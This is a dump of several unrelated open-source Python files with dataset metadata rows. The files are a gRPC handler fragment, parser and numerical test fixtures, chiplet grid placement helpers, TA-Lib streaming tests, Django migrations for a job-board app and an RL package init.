'HandlerDownlink': grpc.stream_unary_rpc_method_handler(
servicer.HandlerDownlink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DownlinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'NetworkServerStatus': grpc.stream_unary_rpc_method_handler(
servicer.NetworkServerStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_networkserver_dot_networkserver__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'monitor.Monitor', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 52.036036 | 164 | 0.796659 | 1,275 | 11,552 | 6.728627 | 0.070588 | 0.03357 | 0.037767 | 0.088122 | 0.857093 | 0.816062 | 0.808719 | 0.742394 | 0.742394 | 0.726891 | 0 | 0.005644 | 0.141101 | 11,552 | 221 | 165 | 52.271493 | 0.859 | 0.072974 | 0 | 0.47541 | 1 | 0 | 0.094596 | 0.031657 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071038 | false | 0.071038 | 0.038251 | 0 | 0.120219 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
062d997af3c51ad84eb97a38ca2da6ebb72da0ba | 133 | py | Python | tests/parser/choice.43.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/choice.43.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/choice.43.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
a :- not b.
b :- not a.
c :- a.
d :- not c.
"""
output = """
a :- not b.
b :- not a.
c :- a.
d :- not c.
"""
| 8.866667 | 12 | 0.338346 | 24 | 133 | 1.875 | 0.291667 | 0.177778 | 0.222222 | 0.266667 | 0.755556 | 0.755556 | 0.755556 | 0.755556 | 0.755556 | 0.755556 | 0 | 0 | 0.37594 | 133 | 14 | 13 | 9.5 | 0.542169 | 0 | 0 | 0.833333 | 0 | 0 | 0.747967 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
23489ff9f548a4e60cb2ea9155f3abccfac001c1 | 2,317 | py | Python | FishboneMoncriefID/tests/trusted_values_dict.py | ksible/nrpytutorial | 4ca6e9da22def2a9c9bcbcad75847fd1db159f4b | [
"BSD-2-Clause"
] | 66 | 2018-06-26T22:18:09.000Z | 2022-02-09T21:12:33.000Z | FishboneMoncriefID/tests/trusted_values_dict.py | ksible/nrpytutorial | 4ca6e9da22def2a9c9bcbcad75847fd1db159f4b | [
"BSD-2-Clause"
] | 14 | 2020-02-13T16:09:29.000Z | 2021-11-12T14:59:59.000Z | FishboneMoncriefID/tests/trusted_values_dict.py | ksible/nrpytutorial | 4ca6e9da22def2a9c9bcbcad75847fd1db159f4b | [
"BSD-2-Clause"
] | 30 | 2019-01-09T09:57:51.000Z | 2022-03-08T18:45:08.000Z | from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
mp.dps = precision
trusted_values_dict = {}
# Generated on: 2019-10-17
# 2019-10-17: added uBL4D[],uBL4U[],uKS4U[]
trusted_values_dict['FishBoneMoncriefID__FishboneMoncriefID__globals'] = {'hm1': mpf('-0.171485955353078502409782000685'), 'IDalpha': mpf('0.755931060760646734042892329128'), 'IDbetaU[0]': mpf('0.214647582556345478472109360788'), 'IDbetaU[1]': mpf('0.241217364020809745026116799651'), 'IDbetaU[2]': mpf('0.281800155328952481540896834564'), 'IDgammaDD[0][0]': mpf('2.03851677635221747252808792529'), 'IDgammaDD[0][1]': mpf('0.0765438379382772951846664774809'), 'IDgammaDD[0][2]': mpf('0.570539327433565151458524763213'), 'IDgammaDD[1][0]': mpf('0.0765438379382772951846664774809'), 'IDgammaDD[1][1]': mpf('0.913606065931442108137857582766'), 'IDgammaDD[1][2]': mpf('-0.103931622633820480927404911623'), 'IDgammaDD[2][0]': mpf('0.570539327433565151458524763213'), 'IDgammaDD[2][1]': mpf('-0.103931622633820480927404911623'), 'IDgammaDD[2][2]': mpf('1.40437373720499632990640350854'), 'IDKDD[0][0]': mpf('0.241372059893883246591607766283'), 'IDKDD[0][1]': mpf('-0.343388055113192085165370755198'), 'IDKDD[0][2]': mpf('-0.590459359927831888413702466884'), 'IDKDD[1][0]': mpf('-0.343388055113192085165370755198'), 'IDKDD[1][1]': mpf('0.401858289197972155074762087828'), 'IDKDD[1][2]': mpf('-0.422578171813805727676385503333'), 'IDKDD[2][0]': mpf('-0.590459359927831888413702466884'), 'IDKDD[2][1]': mpf('-0.422578171813805727676385503333'), 'IDKDD[2][2]': mpf('-0.013929878808310394879734504443'), 'IDValencia3velocityU[0]': mpf('-0.0100201358532234154260289073442'), 'IDValencia3velocityU[1]': mpf('0.580690518031488621148890984891'), 'IDValencia3velocityU[2]': mpf('0.37278552232712119473473993627'), 'rho_initial': mpf('0.284819845942236515284909115899'), 'uBL4D[0]': mpf('-0.614072962517390468138181646896'), 'uBL4D[1]': mpf('0.0'), 'uBL4D[2]': mpf('0.0'), 'uBL4D[3]': mpf('0.105130532924779727240517791034'), 'uBL4U[0]': mpf('2.13294264904845268804664985272'), 'uBL4U[1]': mpf('0.0'), 'uBL4U[2]': mpf('0.0'), 'uBL4U[3]': mpf('0.858967220098163204426095668694'), 'uKS4U[0]': mpf('2.13294264904845268804664985272'), 'uKS4U[1]': mpf('0.0'), 'uKS4U[2]': mpf('0.0'), 'uKS4U[3]': mpf('0.858967220098163204426095668694')}
| 231.7 | 2,114 | 0.738023 | 247 | 2,317 | 6.882591 | 0.251012 | 0.082353 | 0.032353 | 0.010588 | 0.098824 | 0 | 0 | 0 | 0 | 0 | 0 | 0.507463 | 0.045749 | 2,317 | 9 | 2,115 | 257.444444 | 0.26142 | 0.028485 | 0 | 0 | 1 | 0 | 0.703292 | 0.525801 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
2370f61339a04b3037b99e9f86f2f51ec5fa0a79 | 4,217 | py | Python | block_occupation.py | bu-icsg/TAP-2.5D | 3a3f4e5a4d019b2d9cda1f72d8d1755238845dbb | [
"Apache-2.0"
] | 4 | 2021-05-07T11:53:03.000Z | 2022-03-15T07:17:51.000Z | block_occupation.py | bu-icsg/TAP-2.5D | 3a3f4e5a4d019b2d9cda1f72d8d1755238845dbb | [
"Apache-2.0"
] | null | null | null | block_occupation.py | bu-icsg/TAP-2.5D | 3a3f4e5a4d019b2d9cda1f72d8d1755238845dbb | [
"Apache-2.0"
] | null | null | null | def print_grid(grid):
for i in grid:
print (i)
print
def initialize_grid(mi):
grid = [[0 for _ in range(mi+1)] for _ in range(mi+1)]
# boundary protection
for i in range(mi+1):
grid[0][i] = 1
grid[mi][i] = 1
grid[i][0] = 1
grid[i][mi] = 1
return grid
# width and height here are parameters passed in. We consider it is including microbump overhead. The addition should be handled before this module.
def check_block_occupation(grid, granularity, xx, yy, width, height):
# print (int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1)
for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
if (sum(grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1])):
return False
return True
def check_left_occupation(grid, granularity, xx, yy, width, height):
i = int(xx/granularity) - int(width/2/granularity+0.49)
if i<=0:
return False
if (sum(grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1])):
# print (i, grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1])
return False
else:
return True
def check_right_occupation(grid, granularity, xx, yy, width, height):
i = int(xx/granularity) + int(width/2/granularity+0.49)
intp_size = (len(grid) - 1) * granularity
if i >= intp_size:
return False
if (sum(grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1])):
# print (i, grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1])
return False
else:
return True
def check_down_occupation(grid, granularity, xx, yy, width, height):
j = int(yy/granularity) - int(height/2/granularity+0.49)
if j<=0:
return False
for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
if grid[i][j]:
# print (i,j, grid[i][j])
return False
return True
def check_up_occupation(grid, granularity, xx, yy, width, height):
j = int(yy/granularity) + int(height/2/granularity+0.49)
intp_size = (len(grid) - 1) * granularity
if j >= intp_size:
return False
for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
if grid[i][j]:
# print (i,j, grid[i][j])
return False
return True
def set_block_occupation(grid, granularity, xx, yy, width, height, chiplet_index):
for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
for j in range(int(yy/granularity)-int(height/2/granularity+0.49), int(yy/granularity)+int(height/2/granularity+0.49)+1):
grid[i][j] = chiplet_index + 2
return grid
def clear_block_occupation(grid, granularity, xx, yy, width, height, chiplet_index):
for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
for j in range(int(yy/granularity)-int(height/2/granularity+0.49), int(yy/granularity)+int(height/2/granularity+0.49)+1):
if grid[i][j] != chiplet_index + 2:
print (chiplet_index, grid[i][j], i, j)
print ('x- ',int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1, 'y-',int(yy/granularity)-int(height/2/granularity+0.49), int(yy/granularity)+int(height/2/granularity+0.49)+1)
print ("something wrong, chiplet index mismatch")
exit()
grid[i][j] = 0
return grid
def replace_block_occupation(grid, granularity, xx_new, yy_new, width, height, chiplet_index):
for i in range(int(xx_new/granularity)-int(width/2/granularity+0.49), int(xx_new/granularity)+int(width/2/granularity+0.49)+1):
for j in range(int(yy_new/granularity)-int(height/2/granularity+0.49), int(yy_new/granularity)+int(height/2/granularity+0.49)+1):
if (grid[i][j] != chiplet_index + 2) and (grid[i][j] != 0):
return False
return True | 47.920455 | 232 | 0.698601 | 719 | 4,217 | 4.045897 | 0.097357 | 0.182881 | 0.169818 | 0.195944 | 0.850464 | 0.820213 | 0.805775 | 0.805775 | 0.790306 | 0.790306 | 0 | 0.051184 | 0.129002 | 4,217 | 88 | 233 | 47.920455 | 0.740811 | 0.135879 | 0 | 0.486111 | 0 | 0 | 0.012394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.138889 | false | 0 | 0 | 0 | 0.402778 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2374640b4615181342c92933ad7ffe816799f4db | 2,503 | py | Python | talib/test_stream.py | aberja/ta-lib | 75fbfa86824b675ac03b7e30aaa2eaade8a817cc | [
"BSD-2-Clause"
] | 1 | 2022-03-10T02:51:59.000Z | 2022-03-10T02:51:59.000Z | talib/test_stream.py | aberja/ta-lib | 75fbfa86824b675ac03b7e30aaa2eaade8a817cc | [
"BSD-2-Clause"
] | null | null | null | talib/test_stream.py | aberja/ta-lib | 75fbfa86824b675ac03b7e30aaa2eaade8a817cc | [
"BSD-2-Clause"
] | 1 | 2021-05-31T11:51:01.000Z | 2021-05-31T11:51:01.000Z | import numpy as np
import pandas as pd
import talib
from talib import stream
def test_streaming():
a = np.array([1,1,2,3,5,8,13], dtype=float)
r = stream.MOM(a, timeperiod=1)
assert r == 5
r = stream.MOM(a, timeperiod=2)
assert r == 8
r = stream.MOM(a, timeperiod=3)
assert r == 10
r = stream.MOM(a, timeperiod=4)
assert r == 11
r = stream.MOM(a, timeperiod=5)
assert r == 12
r = stream.MOM(a, timeperiod=6)
assert r == 12
r = stream.MOM(a, timeperiod=7)
assert np.isnan(r)
def test_streaming_pandas():
a = pd.Series([1,1,2,3,5,8,13])
r = stream.MOM(a, timeperiod=1)
assert r == 5
r = stream.MOM(a, timeperiod=2)
assert r == 8
r = stream.MOM(a, timeperiod=3)
assert r == 10
r = stream.MOM(a, timeperiod=4)
assert r == 11
r = stream.MOM(a, timeperiod=5)
assert r == 12
r = stream.MOM(a, timeperiod=6)
assert r == 12
r = stream.MOM(a, timeperiod=7)
assert np.isnan(r)
def test_CDL3BLACKCROWS():
o = np.array([39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 40.32, 40.51, 38.09, 35.00])
h = np.array([40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 41.69, 40.84, 38.12, 35.50])
l = np.array([35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 39.26, 36.73, 33.37, 30.03])
c = np.array([40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.46, 37.08, 33.37, 30.03])
r = stream.CDL3BLACKCROWS(o, h, l, c)
assert r == -100
def test_CDL3BLACKCROWS_pandas():
o = pd.Series([39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 40.32, 40.51, 38.09, 35.00])
h = pd.Series([40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 41.69, 40.84, 38.12, 35.50])
l = pd.Series([35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 39.26, 36.73, 33.37, 30.03])
c = pd.Series([40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.46, 37.08, 33.37, 30.03])
r = stream.CDL3BLACKCROWS(o, h, l, c)
assert r == -100
def test_MAXINDEX():
a = np.array([1., 2, 3, 4, 5, 6, 7, 8, 7, 7, 3, 4, 5, 6, 7, 8, 9, 2, 3, 4, 5, 15])
r = stream.MAXINDEX(a, 10)
assert r == 21
| 39.730159 | 145 | 0.569716 | 546 | 2,503 | 2.598901 | 0.122711 | 0.084567 | 0.118393 | 0.146582 | 0.80902 | 0.80902 | 0.800564 | 0.789288 | 0.789288 | 0.789288 | 0 | 0.337576 | 0.215342 | 2,503 | 62 | 146 | 40.370968 | 0.384929 | 0 | 0 | 0.592593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.314815 | 1 | 0.092593 | false | 0 | 0.074074 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
88b8e52bdb4d7a6307952af7fc93b05293b61e4d | 6,032 | py | Python | Users/migrations/0011_auto_20200422_2227.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | 1 | 2022-03-16T11:17:06.000Z | 2022-03-16T11:17:06.000Z | Users/migrations/0011_auto_20200422_2227.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | null | null | null | Users/migrations/0011_auto_20200422_2227.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('Users', '0010_auto_20180606_0002'),
]
operations = [
migrations.RemoveField(
model_name='country',
name='country_name_bg',
),
migrations.RemoveField(
model_name='country',
name='country_name_bs',
),
migrations.RemoveField(
model_name='country',
name='country_name_cs',
),
migrations.RemoveField(
model_name='country',
name='country_name_de',
),
migrations.RemoveField(
model_name='country',
name='country_name_en',
),
migrations.RemoveField(
model_name='country',
name='country_name_hr',
),
migrations.RemoveField(
model_name='country',
name='country_name_mk',
),
migrations.RemoveField(
model_name='country',
name='country_name_pl',
),
migrations.RemoveField(
model_name='country',
name='country_name_ru',
),
migrations.RemoveField(
model_name='country',
name='country_name_sk',
),
migrations.RemoveField(
model_name='country',
name='country_name_sl',
),
migrations.RemoveField(
model_name='country',
name='country_name_sr',
),
migrations.RemoveField(
model_name='country',
name='country_name_uk',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_bg',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_bs',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_cs',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_de',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_en',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_hr',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_mk',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_pl',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_ru',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_sk',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_sl',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_sr',
),
migrations.RemoveField(
model_name='educationdegree',
name='name_uk',
),
migrations.RemoveField(
model_name='gender',
name='name_bg',
),
migrations.RemoveField(
model_name='gender',
name='name_bs',
),
migrations.RemoveField(
model_name='gender',
name='name_cs',
),
migrations.RemoveField(
model_name='gender',
name='name_de',
),
migrations.RemoveField(
model_name='gender',
name='name_en',
),
migrations.RemoveField(
model_name='gender',
name='name_hr',
),
migrations.RemoveField(
model_name='gender',
name='name_mk',
),
migrations.RemoveField(
model_name='gender',
name='name_pl',
),
migrations.RemoveField(
model_name='gender',
name='name_ru',
),
migrations.RemoveField(
model_name='gender',
name='name_sk',
),
migrations.RemoveField(
model_name='gender',
name='name_sl',
),
migrations.RemoveField(
model_name='gender',
name='name_sr',
),
migrations.RemoveField(
model_name='gender',
name='name_uk',
),
migrations.RemoveField(
model_name='language',
name='language_name_bg',
),
migrations.RemoveField(
model_name='language',
name='language_name_bs',
),
migrations.RemoveField(
model_name='language',
name='language_name_cs',
),
migrations.RemoveField(
model_name='language',
name='language_name_de',
),
migrations.RemoveField(
model_name='language',
name='language_name_en',
),
migrations.RemoveField(
model_name='language',
name='language_name_hr',
),
migrations.RemoveField(
model_name='language',
name='language_name_mk',
),
migrations.RemoveField(
model_name='language',
name='language_name_pl',
),
migrations.RemoveField(
model_name='language',
name='language_name_ru',
),
migrations.RemoveField(
model_name='language',
name='language_name_sk',
),
migrations.RemoveField(
model_name='language',
name='language_name_sl',
),
migrations.RemoveField(
model_name='language',
name='language_name_sr',
),
migrations.RemoveField(
model_name='language',
name='language_name_uk',
),
]
| 27.049327 | 45 | 0.503316 | 467 | 6,032 | 6.205567 | 0.087794 | 0.376812 | 0.466529 | 0.538302 | 0.945825 | 0.945825 | 0.928571 | 0.4755 | 0 | 0 | 0 | 0.004608 | 0.388428 | 6,032 | 222 | 46 | 27.171171 | 0.78097 | 0.003481 | 0 | 0.842593 | 0 | 0 | 0.179897 | 0.003828 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009259 | 0 | 0.023148 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
004d7cc26d1bedd8ea738b3892e8fe8caae2a9bf | 9,645 | py | Python | backend/items/migrations/0001_initial.py | moon1ightx/jobify | e2b958d060391f63c5b4d58a8804a779651c78de | [
"MIT"
] | null | null | null | backend/items/migrations/0001_initial.py | moon1ightx/jobify | e2b958d060391f63c5b4d58a8804a779651c78de | [
"MIT"
] | null | null | null | backend/items/migrations/0001_initial.py | moon1ightx/jobify | e2b958d060391f63c5b4d58a8804a779651c78de | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-05-03 06:26
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import items.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('address', models.CharField(max_length=200)),
('city', models.CharField(max_length=100)),
('description', models.TextField()),
('thumbnailPath', models.ImageField(blank=True, null=True, upload_to='')),
('linkedin_link', models.CharField(blank=True, max_length=200, null=True)),
('instagram_link', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='Degree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('created_on', models.DateField(auto_now_add=True, null=True)),
],
),
migrations.CreateModel(
name='JobArea',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='PlanItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('created_on', models.DateField(auto_now_add=True, null=True)),
('useful_links', models.CharField(blank=True, max_length=200, null=True)),
('tutorials', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='Story',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
('thumbnailPath', models.ImageField(blank=True, null=True, upload_to='')),
('source', models.CharField(blank=True, max_length=200, null=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Techno',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('description', models.TextField()),
('created_on', models.DateField(auto_now_add=True, null=True)),
],
),
migrations.CreateModel(
name='University',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('created_on', models.DateField(auto_now_add=True, null=True)),
],
),
migrations.CreateModel(
name='Vacancy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('experience', models.IntegerField()),
('description', models.TextField()),
('salary', models.IntegerField(blank=True, null=True)),
('perks', models.TextField(blank=True, null=True)),
('created_on', models.DateField(auto_now_add=True, null=True)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vacancies', to='items.Company')),
('job_area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vacancies', to='items.JobArea')),
('techno', models.ManyToManyField(to='items.Techno')),
],
),
migrations.CreateModel(
name='Stack',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('description', models.TextField()),
('popularity', models.IntegerField(blank=True, null=True)),
('created_on', models.DateField(auto_now_add=True, null=True)),
('job_area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stack', to='items.JobArea')),
('techno', models.ManyToManyField(to='items.Techno')),
],
),
migrations.CreateModel(
name='Roadmap',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('created_on', models.DateField(auto_now_add=True, null=True)),
('plan', models.ManyToManyField(to='items.PlanItem')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='planitem',
name='techno',
field=models.ManyToManyField(to='items.Techno'),
),
migrations.CreateModel(
name='Internship',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('start_date', models.DateField(blank=True, null=True)),
('description', models.TextField()),
('salary', models.IntegerField(blank=True, null=True)),
('duration', models.IntegerField(blank=True, null=True)),
('created_on', models.DateField(auto_now_add=True, null=True)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='intenrships', to='items.Company')),
('job_area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='intenrships', to='items.JobArea')),
('techno', models.ManyToManyField(to='items.Techno')),
],
),
migrations.CreateModel(
name='Hunter',
fields=[
('user', models.OneToOneField(default=1, on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('phone', models.CharField(blank=True, max_length=20, null=True)),
('birthday', models.DateField(blank=True, null=True)),
('city', models.CharField(blank=True, max_length=100, null=True)),
('thumbnailPath', models.ImageField(blank=True, null=True, upload_to=items.models.upload_user_photo)),
('about', models.CharField(blank=True, max_length=200, null=True)),
('github_link', models.CharField(blank=True, max_length=200, null=True)),
('linkedin_link', models.CharField(blank=True, max_length=200, null=True)),
('instagram_link', models.CharField(blank=True, max_length=200, null=True)),
('account_created_on', models.DateField(auto_now_add=True, null=True)),
('degree', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='hunters', to='items.Degree')),
('job_area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='hunters', to='items.JobArea')),
('techno', models.ManyToManyField(to='items.Techno')),
('univer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='hunters', to='items.University')),
],
),
migrations.CreateModel(
name='Hackathon',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
('thumbnailPath', models.ImageField(blank=True, null=True, upload_to='')),
('place', models.CharField(max_length=100)),
('time', models.DateField(blank=True, null=True)),
('source', models.CharField(max_length=200)),
('created_on', models.DateTimeField(auto_now_add=True)),
('job_area', models.ManyToManyField(to='items.JobArea')),
],
),
]
| 54.185393 | 167 | 0.583204 | 979 | 9,645 | 5.594484 | 0.123596 | 0.055505 | 0.059156 | 0.05587 | 0.849188 | 0.820887 | 0.791309 | 0.784554 | 0.751506 | 0.707687 | 0 | 0.014142 | 0.266874 | 9,645 | 177 | 168 | 54.491525 | 0.76043 | 0.004666 | 0 | 0.635294 | 1 | 0 | 0.111586 | 0.003021 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.023529 | 0 | 0.047059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc8c1f19cc13dd9973c932e4170fac6d59b8d43e | 180 | py | Python | rl/networks/__init__.py | jrobine/smaller-world-models | 2b1a9a0f83668207d8516a95f14131c358a18302 | [
"MIT"
] | null | null | null | rl/networks/__init__.py | jrobine/smaller-world-models | 2b1a9a0f83668207d8516a95f14131c358a18302 | [
"MIT"
] | null | null | null | rl/networks/__init__.py | jrobine/smaller-world-models | 2b1a9a0f83668207d8516a95f14131c358a18302 | [
"MIT"
] | null | null | null | from .action_value import *
from .actor_critic import *
from .policy_gradient import *
from .separate_actor_critic import *
from .shared_actor_critic import *
from .value import *
